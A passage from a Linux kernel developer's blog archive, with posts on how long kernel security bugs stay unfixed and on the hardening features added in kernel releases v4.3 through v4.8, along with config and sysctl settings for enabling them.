codeblog code is freedom — patching my itch

October 20, 2016

CVE-2016-5195

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 4:02 pm

My prior post showed my research from earlier in the year at the 2016 Linux Security Summit on kernel security flaw lifetimes. Now that CVE-2016-5195 is public, here are updated graphs and statistics. Due to their rarity, the Critical bug average has now jumped from 3.3 years to 5.2 years. There aren’t many, but, as I mentioned, they still exist, whether you know about them or not. CVE-2016-5195 was sitting on everyone’s machine when I gave my LSS talk, and there are still other flaws on all our Linux machines right now. (And, I should note, this problem is not unique to Linux.) Dealing with knowing that there are always going to be bugs present requires proactive kernel self-protection (to minimize the effects of possible flaws) and vendors dedicated to updating their devices regularly and quickly (to keep the exposure window minimized once a flaw is widely known).

So, here are the graphs updated for the 668 CVEs known today:

  • Critical: 3 @ 5.2 years average
  • High: 44 @ 6.2 years average
  • Medium: 404 @ 5.3 years average
  • Low: 216 @ 5.5 years average

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 18, 2016

Security bug lifetime

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 9:46 pm

In several of my recent presentations, I’ve discussed the lifetime of security flaws in the Linux kernel. Jon Corbet did an analysis in 2010, and found that security bugs appeared to have roughly a 5 year lifetime. As in, the flaw gets introduced in a Linux release, and then goes unnoticed by upstream developers until another release 5 years later, on average. I updated this research for 2011 through 2016, and used the Ubuntu Security Team’s CVE Tracker to assist in the process. The Ubuntu kernel team already does the hard work of trying to identify when flaws were introduced in the kernel, so I didn’t have to re-do this for the 557 kernel CVEs since 2011.

As the README details, the raw CVE data is spread across the active/, retired/, and ignored/ directories. By scanning through the CVE files to find any that contain the line “Patches_linux:”, I can extract the details on when a flaw was introduced and when it was fixed. For example CVE-2016-0728 shows:

Patches_linux:
 break-fix: 3a50597de8635cd05133bd12c95681c82fe7b878 23567fd052a9abb6d67fe8e7a9ccdd9800a540f2

This means that CVE-2016-0728 is believed to have been introduced by commit 3a50597de8635cd05133bd12c95681c82fe7b878 and fixed by commit 23567fd052a9abb6d67fe8e7a9ccdd9800a540f2. If there are multiple lines, then there may be multiple SHAs identified as contributing to the flaw or the fix. And a “-” is just short-hand for the start of Linux git history.

Then for each SHA, I queried git to find its corresponding release, and made a mapping of release version to release date, wrote out the raw data, and rendered graphs. Each vertical line shows a given CVE from when it was introduced to when it was fixed. Red is “Critical”, orange is “High”, blue is “Medium”, and black is “Low”:

CVE lifetimes 2011-2016

And here it is zoomed in to just Critical and High:

Critical and High CVE lifetimes 2011-2016

The line in the middle is the date from which I started the CVE search (2011). The vertical axis is actually linear time, but it’s labeled with kernel releases (which are pretty regular). The numerical summary is:

  • Critical: 2 @ 3.3 years
  • High: 34 @ 6.4 years
  • Medium: 334 @ 5.2 years
  • Low: 186 @ 5.0 years

This comes out to roughly 5 years lifetime again, so not much has changed from Jon’s 2010 analysis.

While we’re getting better at fixing bugs, we’re also adding more bugs. And for many devices that have been built on a given kernel version, there haven’t been frequent (or some times any) security updates, so the bug lifetime for those devices is even longer. To really create a safe kernel, we need to get proactive about self-protection technologies. The systems using a Linux kernel are right now running with security flaws. Those flaws are just not known to the developers yet, but they’re likely known to attackers, as there have been prior boasts/gray-market advertisements for at least CVE-2010-3081 and CVE-2013-2888.

(Edit: see my updated graphs that include CVE-2016-5195.)

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 4, 2016

security things in Linux v4.8

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 5:26 pm

Previously: v4.7. Here are a bunch of security things I’m excited about in Linux v4.8:

SLUB freelist ASLR

Thomas Garnier continued his freelist randomization work by adding SLUB support.

x86_64 KASLR text base offset physical/virtual decoupling

On x86_64, to implement the KASLR text base offset, the physical memory location of the kernel was randomized, which resulted in the virtual address being offset as well. Due to how the kernel’s “-2GB” addressing works (gcc‘s “-mcmodel=kernel“), it wasn’t possible to randomize the physical location beyond the 2GB limit, leaving any additional physical memory unused as a randomization target. In order to decouple the physical and virtual location of the kernel (to make physical address exposures less valuable to attackers), the physical location of the kernel needed to be randomized separately from the virtual location. This required a lot of work for handling very large addresses spanning terabytes of address space. Yinghai Lu, Baoquan He, and I landed a series of patches that ultimately did this (and in the process fixed some other bugs too). This expands the physical offset entropy to roughly $physical_memory_size_of_system / 2MB bits.

x86_64 KASLR memory base offset

Thomas Garnier rolled out KASLR to the kernel’s various statically located memory ranges, randomizing their locations with CONFIG_RANDOMIZE_MEMORY. One of the more notable things randomized is the physical memory mapping, which is a known target for attacks. Also randomized is the vmalloc area, which makes attacks against targets vmalloced during boot (which tend to always end up in the same location on a given system) are now harder to locate. (The vmemmap region randomization accidentally missed the v4.8 window and will appear in v4.9.)

x86_64 KASLR with hibernation

Rafael Wysocki (with Thomas Garnier, Borislav Petkov, Yinghai Lu, Logan Gunthorpe, and myself) worked on a number of fixes to hibernation code that, even without KASLR, were coincidentally exposed by the earlier W^X fix. With that original problem fixed, then memory KASLR exposed more problems. I’m very grateful everyone was able to help out fixing these, especially Rafael and Thomas. It’s a hard place to debug. The bottom line, now, is that hibernation and KASLR are no longer mutually exclusive.

gcc plugin infrastructure

Emese Revfy ported the PaX/Grsecurity gcc plugin infrastructure to upstream. If you want to perform compiler-based magic on kernel builds, now it’s much easier with CONFIG_GCC_PLUGINS! The plugins live in scripts/gcc-plugins/. Current plugins are a short example called “Cyclic Complexity” which just emits the complexity of functions as they’re compiled, and “Sanitizer Coverage” which provides the same functionality as gcc’s recent “-fsanitize-coverage=trace-pc” but back through gcc 4.5. Another notable detail about this work is that it was the first Linux kernel security work funded by Linux Foundation’s Core Infrastructure Initiative. I’m looking forward to more plugins!

If you’re on Debian or Ubuntu, the required gcc plugin headers are available via the gcc-$N-plugin-dev package (and similarly for all cross-compiler packages).

hardened usercopy

Along with work from Rik van Riel, Laura Abbott, Casey Schaufler, and many other folks doing testing on the KSPP mailing list, I ported part of PAX_USERCOPY (the basic runtime bounds checking) to upstream as CONFIG_HARDENED_USERCOPY. One of the interface boundaries between the kernel and user-space are the copy_to_user()/copy_from_user() family of functions. Frequently, the size of a copy is known at compile-time (“built-in constant”), so there’s not much benefit in checking those sizes (hardened usercopy avoids these cases). In the case of dynamic sizes, hardened usercopy checks for 3 areas of memory: slab allocations, stack allocations, and kernel text. Direct kernel text copying is simply disallowed. Stack copying is allowed as long as it is entirely contained by the current stack memory range (and on x86, only if it does not include the saved stack frame and instruction pointers). For slab allocations (e.g. those allocated through kmem_cache_alloc() and the kmalloc()-family of functions), the copy size is compared against the size of the object being copied. For example, if copy_from_user() is writing to a structure that was allocated as size 64, but the copy gets tricked into trying to write 65 bytes, hardened usercopy will catch it and kill the process.

For testing hardened usercopy, lkdtm gained several new tests: USERCOPY_HEAP_SIZE_TO, USERCOPY_HEAP_SIZE_FROM, USERCOPY_STACK_FRAME_TO,
USERCOPY_STACK_FRAME_FROM, USERCOPY_STACK_BEYOND, and USERCOPY_KERNEL. Additionally, USERCOPY_HEAP_FLAG_TO and USERCOPY_HEAP_FLAG_FROM were added to test what will be coming next for hardened usercopy: flagging slab memory as “safe for copy to/from user-space”, effectively whitelisting certainly slab caches, as done by PAX_USERCOPY. This further reduces the scope of what’s allowed to be copied to/from, since most kernel memory is not intended to ever be exposed to user-space. Adding this logic will require some reorganization of usercopy code to add some new APIs, as PAX_USERCOPY’s approach to handling special-cases is to add bounce-copies (copy from slab to stack, then copy to userspace) as needed, which is unlikely to be acceptable upstream.

seccomp reordered after ptrace

By its original design, seccomp filtering happened before ptrace so that seccomp-based ptracers (i.e. SECCOMP_RET_TRACE) could explicitly bypass seccomp filtering and force a desired syscall. Nothing actually used this feature, and as it turns out, it’s not compatible with process launchers that install seccomp filters (e.g. systemd, lxc) since as long as the ptrace and fork syscalls are allowed (and fork is needed for any sensible container environment), a process could spawn a tracer to help bypass a filter by injecting syscalls. After Andy Lutomirski convinced me that ordering ptrace first does not change the attack surface of a running process (unless all syscalls are blacklisted, the entire ptrace attack surface will always be exposed), I rearranged things. Now there is no (expected) way to bypass seccomp filters, and containers with seccomp filters can allow ptrace again.

Edit: missed this next feature when I originally posted

NX stack and heap on MIPS

Other architectures have had a non-executable stack and heap for a while now, and now MIPS has caught up, thanks to Paul Barton. The primary reason for the delay was finding a way to cleanly deal with branch delay slot instructions which needed a place to write instructions. Traditionally this was on the stack, but now it’s handled with a per-mm page.

That’s it for v4.8! The merge window is open for v4.9

© 2016 – 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 3, 2016

security things in Linux v4.7

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 12:47 am

Previously: v4.6. Onward to security things I found interesting in Linux v4.7:

KASLR text base offset for MIPS

Matt Redfearn added text base address KASLR to MIPS, similar to what’s available on x86 and arm64. As done with x86, MIPS attempts to gather entropy from various build-time, run-time, and CPU locations in an effort to find reasonable sources during early-boot. MIPS doesn’t yet have anything as strong as x86’s RDRAND (though most have an instruction counter like x86’s RDTSC), but it does have the benefit of being able to use Device Tree (i.e. the “/chosen/kaslr-seed” property) like arm64 does. By my understanding, even without Device Tree, MIPS KASLR entropy should be as strong as pre-RDRAND x86 entropy, which is more than sufficient for what is, similar to x86, not a huge KASLR range anyway: default 8 bits (a span of 16MB with 64KB alignment), though CONFIG_RANDOMIZE_BASE_MAX_OFFSET can be tuned to the device’s memory, giving a maximum of 11 bits on 32-bit, and 15 bits on EVA or 64-bit.

SLAB freelist ASLR

Thomas Garnier added CONFIG_SLAB_FREELIST_RANDOM to make slab allocation layouts less deterministic with a per-boot randomized freelist order. This raises the bar for successful kernel slab attacks. Attackers will need to either find additional bugs to help leak slab layout information or will need to perform more complex grooming during an attack. Thomas wrote a post describing the feature in more detail here: Randomizing the Linux kernel heap freelists. (SLAB is done in v4.7, and SLUB in v4.8.)

eBPF JIT constant blinding

Daniel Borkmann implemented constant blinding in the eBPF JIT subsystem. With strong kernel memory protections (CONFIG_DEBUG_RODATA) in place, and with the segregation of user-space memory execution from kernel (i.e SMEP, PXN, CONFIG_CPU_SW_DOMAIN_PAN), having a place where user-space can inject content into an executable area of kernel memory becomes very high-value to an attacker. The eBPF JIT was exactly such a thing: the use of BPF constants could result in the JIT producing instruction flows that could include attacker-controlled instructions (e.g. by directing execution into the middle of an instruction with a constant that would be interpreted as a native instruction). The eBPF JIT already uses a number of other defensive tricks (e.g. random starting position), but this added randomized blinding to any BPF constants, which makes building a malicious execution path in the eBPF JIT memory much more difficult (and helps block attempts at JIT spraying to bypass other protections).

Elena Reshetova updated a 2012 proof-of-concept attack to succeed against modern kernels to help provide a working example of what needed fixing in the JIT. This serves as a thorough regression test for the protection.

The cBPF JITs that exist in ARM, MIPS, PowerPC, and Sparc still need to be updated to eBPF, but when they do, they’ll gain all these protections immediatley.

Bottom line is that if you enable the (disabled-by-default) bpf_jit_enable sysctl, be sure to set the bpf_jit_harden sysctl to 2 (to perform blinding even for root).

fix brk ASLR weakness on arm64 compat

There have been a few ASLR fixes recently (e.g. ET_DYN, x86 32-bit unlimited stack), and while reviewing some suggested fixes to arm64 brk ASLR code from Jon Medhurst, I noticed that arm64’s brk ASLR entropy was slightly too low (less than 1 bit) for 64-bit and noticeably lower (by 2 bits) for 32-bit compat processes when compared to native 32-bit arm. I simplified the code by using literals for the entropy. Maybe we can add a sysctl some day to control brk ASLR entropy like was done for mmap ASLR entropy.

LoadPin LSM

LSM stacking is well-defined since v4.2, so I finally upstreamed a “small” LSM that implements a protection I wrote for Chrome OS several years back. On systems with a static root of trust that extends to the filesystem level (e.g. Chrome OS’s coreboot+depthcharge boot firmware chaining to dm-verity, or a system booting from read-only media), it’s redundant to sign kernel modules (you’ve already got the modules on read-only media: they can’t change). The kernel just needs to know they’re all coming from the correct location. (And this solves loading known-good firmware too, since there is no convention for signed firmware in the kernel yet.) LoadPin requires that all modules, firmware, etc come from the same mount (and assumes that the first loaded file defines which mount is “correct”, hence load “pinning”).

That’s it for v4.7. Prepare yourself for v4.8 next!

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 30, 2016

security things in Linux v4.6

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 11:45 pm

Previously: v4.5. The v4.6 Linux kernel release included a bunch of stuff, with much more of it under the KSPP umbrella.

seccomp support for parisc

Helge Deller added seccomp support for parisc, which including plumbing support for PTRACE_GETREGSET to get the self-tests working.

x86 32-bit mmap ASLR vs unlimited stack fixed

Hector Marco-Gisbert removed a long-standing limitation to mmap ASLR on 32-bit x86, where setting an unlimited stack (e.g. “ulimit -s unlimited“) would turn off mmap ASLR (which provided a way to bypass ASLR when executing setuid processes). Given that ASLR entropy can now be controlled directly (see the v4.5 post), and that the cases where this created an actual problem are very rare, means that if a system sees collisions between unlimited stack and mmap ASLR, they can just adjust the 32-bit ASLR entropy instead.

x86 execute-only memory

Dave Hansen added Protection Key support for future x86 CPUs and, as part of this, implemented support for “execute only” memory in user-space. On pkeys-supporting CPUs, using mmap(..., PROT_EXEC) (i.e. without PROT_READ) will mean that the memory can be executed but cannot be read (or written). This provides some mitigation against automated ROP gadget finding where an executable is read out of memory to find places that can be used to build a malicious execution path. Using this will require changing some linker behavior (to avoid putting data in executable areas), but seems to otherwise Just Work. I’m looking forward to either emulated QEmu support or access to one of these fancy CPUs.

CONFIG_DEBUG_RODATA enabled by default on arm and arm64, and mandatory on x86

Ard Biesheuvel (arm64) and I (arm) made the poorly-named CONFIG_DEBUG_RODATA enabled by default. This feature controls whether the kernel enforces proper memory protections on its own memory regions (code memory is executable and read-only, read-only data is actually read-only and non-executable, and writable data is non-executable). This protection is a fundamental security primitive for kernel self-protection, so making it on-by-default is required to start any kind of attack surface reduction within the kernel.

On x86 CONFIG_DEBUG_RODATA was already enabled by default, but, at Ingo Molnar’s suggestion, I made it mandatory: CONFIG_DEBUG_RODATA cannot be turned off on x86. I expect we’ll get there with arm and arm64 too, but the protection is still somewhat new on these architectures, so it’s reasonable to continue to leave an “out” for developers that find themselves tripping over it.

arm64 KASLR text base offset

Ard Biesheuvel reworked a ton of arm64 infrastructure to support kernel relocation and, building on that, Kernel Address Space Layout Randomization of the kernel text base offset (and module base offset). As with x86 text base KASLR, this is a probabilistic defense that raises the bar for kernel attacks where finding the KASLR offset must be added to the chain of exploits used for a successful attack. One big difference from x86 is that the entropy for the KASLR must come either from Device Tree (in the “/chosen/kaslr-seed” property) or from UEFI (via EFI_RNG_PROTOCOL), so if you’re building arm64 devices, make sure you have a strong source of early-boot entropy that you can expose through your boot-firmware or boot-loader.

zero-poison after free

Laura Abbott reworked a bunch of the kernel memory management debugging code to add zeroing of freed memory, similar to PaX/Grsecurity’s PAX_MEMORY_SANITIZE feature. This feature means that memory is cleared at free, wiping any sensitive data so it doesn’t have an opportunity to leak in various ways (e.g. accidentally uninitialized structures or padding), and that certain types of use-after-free flaws cannot be exploited since the memory has been wiped. To take things even a step further, the poisoning can be verified at allocation time to make sure that nothing wrote to it between free and allocation (called “sanity checking”), which can catch another small subset of flaws.

To understand the pieces of this, it’s worth describing that the kernel’s higher level allocator, the “page allocator” (e.g. __get_free_pages()) is used by the finer-grained “slab allocator” (e.g. kmem_cache_alloc(), kmalloc()). Poisoning is handled separately in both allocators. The zero-poisoning happens at the page allocator level. Since the slab allocators tend to do their own allocation/freeing, their poisoning happens separately (since on slab free nothing has been freed up to the page allocator).

Only limited performance tuning has been done, so the penalty is rather high at the moment, at about 9% when doing a kernel build workload. Future work will include some exclusion of frequently-freed caches (similar to PAX_MEMORY_SANITIZE), and making the options entirely CONFIG controlled (right now both CONFIGs are needed to build in the code, and a kernel command line is needed to activate it). Performing the sanity checking (mentioned above) adds another roughly 3% penalty. In the general case (and once the performance of the poisoning is improved), the security value of the sanity checking isn’t worth the performance trade-off.

Tests for the features can be found in lkdtm as READ_AFTER_FREE and READ_BUDDY_AFTER_FREE. If you’re feeling especially paranoid and have enabled sanity-checking, WRITE_AFTER_FREE and WRITE_BUDDY_AFTER_FREE can test these as well.

To perform zero-poisoning of page allocations and (currently non-zero) poisoning of slab allocations, build with:

CONFIG_DEBUG_PAGEALLOC=n
CONFIG_PAGE_POISONING=y
CONFIG_PAGE_POISONING_NO_SANITY=y
CONFIG_PAGE_POISONING_ZERO=y
CONFIG_SLUB_DEBUG=y

and enable the page allocator poisoning and slab allocator poisoning at boot with this on the kernel command line:

page_poison=on slub_debug=P

To add sanity-checking, change PAGE_POISONING_NO_SANITY=n, and add “F” to slub_debug as “slub_debug=PF“.

read-only after init

I added the infrastructure to support making certain kernel memory read-only after kernel initialization (inspired by a small part of PaX/Grsecurity’s KERNEXEC functionality). The goal is to continue to reduce the attack surface within the kernel by making even more of the memory, especially function pointer tables, read-only (which depends on CONFIG_DEBUG_RODATA above).

Function pointer tables (and similar structures) are frequently targeted by attackers when redirecting execution. While many are already declared “const” in the kernel source code, making them read-only (and therefore unavailable to attackers) for their entire lifetime, there is a class of variables that get initialized during kernel (and module) start-up (i.e. written to during functions that are marked “__init“) and then never (intentionally) written to again. Some examples are things like the VDSO, vector tables, arch-specific callbacks, etc.

As it turns out, most architectures with kernel memory protection already delay making their data read-only until after __init (see mark_rodata_ro()), so it’s trivial to declare a new data section (“.data..ro_after_init“) and add it to the existing read-only data section (“.rodata“). Kernel structures can be annotated with the new section (via the “__ro_after_init” macro), and they’ll become read-only once boot has finished.

The next step for attack surface reduction infrastructure will be to create a kernel memory region that is passively read-only, but can be made temporarily writable (by a single un-preemptable CPU), for storing sensitive structures that are written to only very rarely. Once this is done, much more of the kernel’s attack surface can be made read-only for the majority of its lifetime.

As people identify places where __ro_after_init can be used, we can grow the protection. A good place to start is to look through the PaX/Grsecurity patch to find uses of __read_only on variables that are only written to during __init functions. The rest are places that will need the temporarily-writable infrastructure (PaX/Grsecurity uses pax_open_kernel()/pax_close_kernel() for these).

That’s it for v4.6, next up will be v4.7!

© 2016 – 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 28, 2016

security things in Linux v4.5

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 1:58 pm

Previously: v4.4. Some things I found interesting in the Linux kernel v4.5:

CONFIG_IO_STRICT_DEVMEM

The CONFIG_STRICT_DEVMEM setting that has existed for a long time already protects system RAM from being accessible through the /dev/mem device node to root in user-space. Dan Williams added CONFIG_IO_STRICT_DEVMEM to extend this so that if a kernel driver has reserved a device memory region for use, it will become unavailable to /dev/mem also. The reservation in the kernel was to keep other kernel things from using the memory, so this is just common sense to make sure user-space can’t stomp on it either. Everyone should have this enabled. (And if you have a system where you discover you need IO memory access from userspace, you can boot with “iomem=relaxed” to disable this at runtime.)

If you’re looking to create a very bright line between user-space having access to device memory, it’s worth noting that if a device driver is a module, a malicious root user can just unload the module (freeing the kernel memory reservation), fiddle with the device memory, and then reload the driver module. So either just leave out /dev/mem entirely (not currently possible with upstream), build a monolithic kernel (no modules), or otherwise block (un)loading of modules (/proc/sys/kernel/modules_disabled).

ptrace fsuid checking

Jann Horn fixed some corner-cases in how ptrace access checks were handled on special files in /proc. For example, prior to this fix, if a setuid process temporarily dropped privileges to perform actions as a regular user, the ptrace checks would not notice the reduced privilege, possibly allowing a regular user to trick a privileged process into disclosing things out of /proc (ASLR offsets, restricted directories, etc) that they normally would be restricted from seeing.

ASLR entropy sysctl

Daniel Cashman standardized the way architectures declare their maximum user-space ASLR entropy (CONFIG_ARCH_MMAP_RND_BITS_MAX) and then created a sysctl (/proc/sys/vm/mmap_rnd_bits) so that system owners could crank up entropy. For example, the default entropy on 32-bit ARM was 8 bits, but the maximum could be as much as 16. If your 64-bit kernel is built with CONFIG_COMPAT, there’s a compat version of the sysctl as well, for controlling the ASLR entropy of 32-bit processes: /proc/sys/vm/mmap_rnd_compat_bits.

Here’s how to crank your entropy to the max, without regard to what architecture you’re on:

for i in "" "compat_"; do f=/proc/sys/vm/mmap_rnd_${i}bits; n=$(cat $f); while echo $n > $f ; do n=$(( n + 1 )); done; done

strict sysctl writes

Two years ago I added a sysctl for treating sysctl writes more like regular files (i.e. what’s written first is what appears at the start), rather than like a ring-buffer (what’s written last is what appears first). At the time it wasn’t clear what might break if this was enabled, so a WARN was added to the kernel. Since only one such string showed up in searches over the last two years, the strict writing mode was made the default. The setting remains available as /proc/sys/kernel/sysctl_writes_strict.

seccomp UM support

Mickaël Salaün added seccomp support (and selftests) for user-mode Linux. Moar architectures!

seccomp NNP vs TSYNC fix

Jann Horn noticed and fixed a problem where if a seccomp filter was already in place on a process (after being installed by a privileged process like systemd, a container launcher, etc) then the setting of the “no new privs” flag could be bypassed when adding filters with the SECCOMP_FILTER_FLAG_TSYNC flag set. Bypassing NNP meant it might be possible to trick a buggy setuid program into doing things as root after a seccomp filter forced a privilege drop to fail (generally referred to as the “sendmail setuid flaw”). With NNP set, a setuid program can’t be run in the first place.

That’s it! Next I’ll cover v4.6

Edit: Added notes about “iomem=…”

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 27, 2016

security things in Linux v4.4

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 2:47 pm

Previously: v4.3. Continuing with interesting security things in the Linux kernel, here’s v4.4. As before, if you think there’s stuff I missed that should get some attention, please let me know.

seccomp Checkpoint/Restore-In-Userspace

Tycho Andersen added a way to extract and restore seccomp filters from running processes via PTRACE_SECCOMP_GET_FILTER under CONFIG_CHECKPOINT_RESTORE. This is a continuation of his work (that I failed to mention in my prior post) from v4.3, which introduced a way to suspend and resume seccomp filters. As I mentioned at the time (and for which he continues to quote me) “this feature gives me the creeps.” :)

x86 W^X detection

Stephen Smalley noticed that there was still a range of kernel memory (just past the end of the kernel code itself) that was incorrectly marked writable and executable, defeating the point of CONFIG_DEBUG_RODATA which seeks to eliminate these kinds of memory ranges. He corrected this in v4.3 and added CONFIG_DEBUG_WX in v4.4 which performs a scan of memory at boot time and yells loudly if unexpected memory protection are found. To nobody’s delight, it was shortly discovered the UEFI leaves chunks of memory in this state too, which posed an ugly-to-solve problem (which Matt Fleming addressed in v4.6).

x86_64 vsyscall CONFIG

I introduced a way to control the mode of the x86_64 vsyscall with a build-time CONFIG selection, though the choice I really care about is CONFIG_LEGACY_VSYSCALL_NONE, to force the vsyscall memory region off by default. The vsyscall memory region was always mapped into process memory at a fixed location, and it originally posed a security risk as a ROP gadget execution target. The vsyscall emulation mode was added to mitigate the problem, but it still left fixed-position static memory content in all processes, which could still pose a security risk. The good news is that glibc since version 2.15 doesn’t need vsyscall at all, so it can just be removed entirely. Any kernel built this way that discovered they needed to support a pre-2.15 glibc could still re-enable it at the kernel command line with “vsyscall=emulate”.

That’s it for v4.4. Tune in tomorrow for v4.5!

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 26, 2016

security things in Linux v4.3

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 2:54 pm

When I gave my State of the Kernel Self-Protection Project presentation at the 2016 Linux Security Summit, I included some slides covering some quick bullet points on things I found of interest in recent Linux kernel releases. Since there wasn’t a lot of time to talk about them all, I figured I’d make some short blog posts here about the stuff I was paying attention to, along with links to more information. This certainly isn’t everything security-related or generally of interest, but they’re the things I thought needed to be pointed out. If there’s something security-related you think I should cover from v4.3, please mention it in the comments. I’m sure I haven’t caught everything. :)

A note on timing and context: the momentum for starting the Kernel Self Protection Project got rolling well before it was officially announced on November 5th last year. To that end, I included stuff from v4.3 (which was developed in the months leading up to November) under the umbrella of the project, since the goals of KSPP aren’t unique to the project nor must the goals be met by people that are explicitly participating in it. Additionally, not everything I think worth mentioning here technically falls under the “kernel self-protection” ideal anyway — some things are just really interesting userspace-facing features.

So, to that end, here are things I found interesting in v4.3:

CONFIG_CPU_SW_DOMAIN_PAN

Russell King implemented this feature for ARM which provides emulated segregation of user-space memory when running in kernel mode, by using the ARM Domain access control feature. This is similar to a combination of Privileged eXecute Never (PXN, in later ARMv7 CPUs) and Privileged Access Never (PAN, coming in future ARMv8.1 CPUs): the kernel cannot execute user-space memory, and cannot read/write user-space memory unless it was explicitly prepared to do so. This stops a huge set of common kernel exploitation methods, where either a malicious executable payload has been built in user-space memory and the kernel was redirected to run it, or where malicious data structures have been built in user-space memory and the kernel was tricked into dereferencing the memory, ultimately leading to a redirection of execution flow.

This raises the bar for attackers since they can no longer trivially build code or structures in user-space where they control the memory layout, locations, etc. Instead, an attacker must find areas in kernel memory that are writable (and in the case of code, executable), where they can discover the location as well. For an attacker, there are vastly fewer places where this is possible in kernel memory as opposed to user-space memory. And as we continue to reduce the attack surface of the kernel, these opportunities will continue to shrink.

While hardware support for this kind of segregation exists in s390 (natively separate memory spaces), ARM (PXN and PAN as mentioned above), and very recent x86 (SMEP since Ivy-Bridge, SMAP since Skylake), ARM is the first upstream architecture to provide this emulation for existing hardware. Everyone running ARMv7 CPUs with this kernel feature enabled suddenly gains the protection. Similar emulation protections (PAX_MEMORY_UDEREF) have been available in PaX/Grsecurity for a while, and I’m delighted to see a form of this land in upstream finally.

To test this kernel protection, the ACCESS_USERSPACE and EXEC_USERSPACE triggers for lkdtm have existed since Linux v3.13, when they were introduced in anticipation of the x86 SMEP and SMAP features.

Ambient Capabilities

Andy Lutomirski (with Christoph Lameter and Serge Hallyn) implemented a way for processes to pass capabilities across exec() in a sensible manner. Until Ambient Capabilities, any capabilities available to a process would only be passed to a child process if the new executable was correctly marked with filesystem capability bits. This turns out to be a real headache for anyone trying to build an even marginally complex “least privilege” execution environment. The case that Chrome OS ran into was having a network service daemon responsible for calling out to helper tools that would perform various networking operations. Keeping the daemon not running as root and retaining the needed capabilities in children required conflicting or crazy filesystem capabilities organized across all the binaries in the expected tree of privileged processes. (For example you may need to set filesystem capabilities on bash!) By being able to explicitly pass capabilities at runtime (instead of based on filesystem markings), this becomes much easier.

For more details, the commit message is well-written, almost twice as long as than the code changes, and contains a test case. If that isn’t enough, there is a self-test available in tools/testing/selftests/capabilities/ too.

PowerPC and Tile support for seccomp filter

Michael Ellerman added support for seccomp to PowerPC, and Chris Metcalf added support to Tile. As the seccomp maintainer, I get excited when an architecture adds support, so here we are with two. Also included were updates to the seccomp self-tests (in tools/testing/selftests/seccomp), to help make sure everything continues working correctly.

That’s it for v4.3. If I missed stuff you found interesting, please let me know! I’m going to try to get more per-version posts out in time to catch up to v4.8, which appears to be tentatively scheduled for release this coming weekend. Next: v4.4.

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

November 11, 2015

evolution of seccomp

Filed under: Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 10:01 am

I’m excited to see other people thinking about userspace-to-kernel attack surface reduction ideas. Theo de Raadt recently published slides describing Pledge. This uses the same ideas that seccomp implements, but with less granularity. While seccomp works at the individual syscall level and in addition to killing processes, it allows for signaling, tracing, and errno spoofing. As de Raadt mentions, Pledge could be implemented with seccomp very easily: libseccomp would just categorize syscalls.

I don’t really understand the presentation’s mention of “Optional Security”, though. Pledge, like seccomp, is an opt-in feature. Nothing in the kernel refuses to run “unpledged” programs. I assume his point was that when it gets ubiquitously built into programs (like stack protector), it’s effectively not optional (which is alluded to later as “comprehensive applicability ~= mandatory mitigation”). Regardless, this sensible (though optional) design gets me back to his slide on seccomp, which seems to have a number of misunderstandings:

  • A Turing complete eBPF program watches your program Strictly speaking, seccomp is implemented using a subset of BPF, not eBPF. And since BPF (and eBPF) programs are guaranteed to halt, it makes seccomp filters not Turing complete.
  • Who watches the watcher? I don’t even understand this. It’s in the kernel. The kernel watches your program. Just like always. If this is a question of BPF program verification, there is literally a program verifier that checks various properties of the BPF program.
  • seccomp program is stored elsewhere This, with the next statement, is just totally misunderstood. Programs using seccomp define their program in their own code. It’s used the same way as the Pledge examples are shown doing.
  • Easy to get desyncronized either program is updated As above, this just isn’t the case. The only place where this might be true is when using seccomp on programs that were not written natively with seccomp. In that case, yes, desync is possible. But that’s one of the advantages of seccomp’s design: a program launcher (like minijail or systemd) can declare a seccomp filter for a program that hasn’t yet been ported to use one natively.
  • eBPF watcher has no real idea what the program under observation is doing… I don’t understand this statement. I don’t see how Pledge would “have a real idea” either: they’re both doing filtering. If we get AI out of our syscall filters, we’re in serious trouble. :)

OpenBSD has some interesting advantages in the syscall filtering department, especially around sockets. Right now, it’s hard for Linux syscall filtering to understand why a given socket is being used. Something like SOCK_DNS seems like it could be quite handy.

Another nice feature of Pledge is the path whitelist feature. As it’s still under development, I hope they expand this to include more things than just paths. Argument inspection is a weak point for seccomp, but under Linux, most of the arguments are ultimately exposed to the LSM layer. Last year I experimented with creating a “seccomp LSM” for path matching where programs could declare whitelists, similar to standard LSMs.

So, yes, Linux “could match this API on seccomp”. It’d just take some extensions to libseccomp to implement pledge(), as I described at the top. With OpenBSD doing a bunch of analysis work on common programs, it’d be excellent to see this usable on Linux too. So far on Linux, only a few programs (e.g. Chrome, vsftpd) have bothered to do this using seccomp, and it could be argued that this is ultimately due to how fine grained it is.

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

June 13, 2014

glibc select weakness fixed

Filed under: Blogging,Chrome OS,Debian,General,Security,Ubuntu,Ubuntu-Server — kees @ 11:21 am

